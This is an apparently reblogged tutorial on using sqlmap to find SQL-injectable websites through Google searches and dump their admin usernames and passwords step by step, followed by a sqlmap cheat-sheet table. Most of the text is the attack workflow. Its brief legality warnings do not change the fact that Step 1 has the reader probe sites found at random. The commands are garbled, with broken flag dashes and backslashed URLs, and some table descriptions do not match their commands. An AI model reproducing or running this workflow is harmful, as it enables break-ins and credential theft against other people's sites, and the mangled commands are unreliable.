Kali Linux How To Use SQLmap for SQL Injection – Find Website Admin Password
How to test if a website is vulnerable to SQL injection. To be legal, use your own website.
Step 1 – Google for php?=id1
Google for php?=id1
add a Single quote… to the end of the URL.
so it reads php?=id1′
If you get an error the website is vulnerable. Go to step 2.
If this is your own website – shut it down immediately. You need to secure it before you bring it back online.
******
Step 2 – Kali SQLMAP – get website databases
SQLMAP – u http:\\website.com/page.php?id=1 –dbs
This will fetch all available databases on the website. Did you see them listed?
******
Step 3 – Find the LOGIN table
SQLMAP – u http:\\website.com/page.php?id=1 –D www – tables
Did you see all the TABLES on the website list out?
Look for likely targets… eg Login, username or password table.
If you’re not on your own website, or a best friends website (who’s sat next to you), you are into illegal terrority. STOP now!!
******
Step 4 – Get all the Login Data (from Step 3)
SQLMAP – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login –columns
This should display columns with items such as Cookie, ID, IP, Password, Username.
******
Step 5 – Get Usernames (& Admin)
SQLMAP – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C username –dump
Look for “admin”
*****
Step 6 – Get Passwords (of Admin)
SQLMAP – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C password –dump
That’s it.
Game over!
****
SQLMap Examples
COMMAND | DESCRIPTION |
---|---|
sqlmap -u http://meh.com --forms --batch --crawl=10 |
Automated sqlmap scan |
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE |
Targeted sqlmap scan |
sqlmap -u "http://meh.com/meh.php?id=1" |
Scan url for union + error based injection with mysql backend and use a random user agent + database dump |
sqlmap -o -u "http://meh.com/form/" --forms |
sqlmap check form for injection |
sqlmap -o -u "http://meh/vuln-form" --forms |
sqlmap dump and crack hashes for table users on database-name. |
Reference:
Pen Testing Cheat Sheet
https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/
Reblogged this on Người Đến Từ Bình Dương.
LikeLike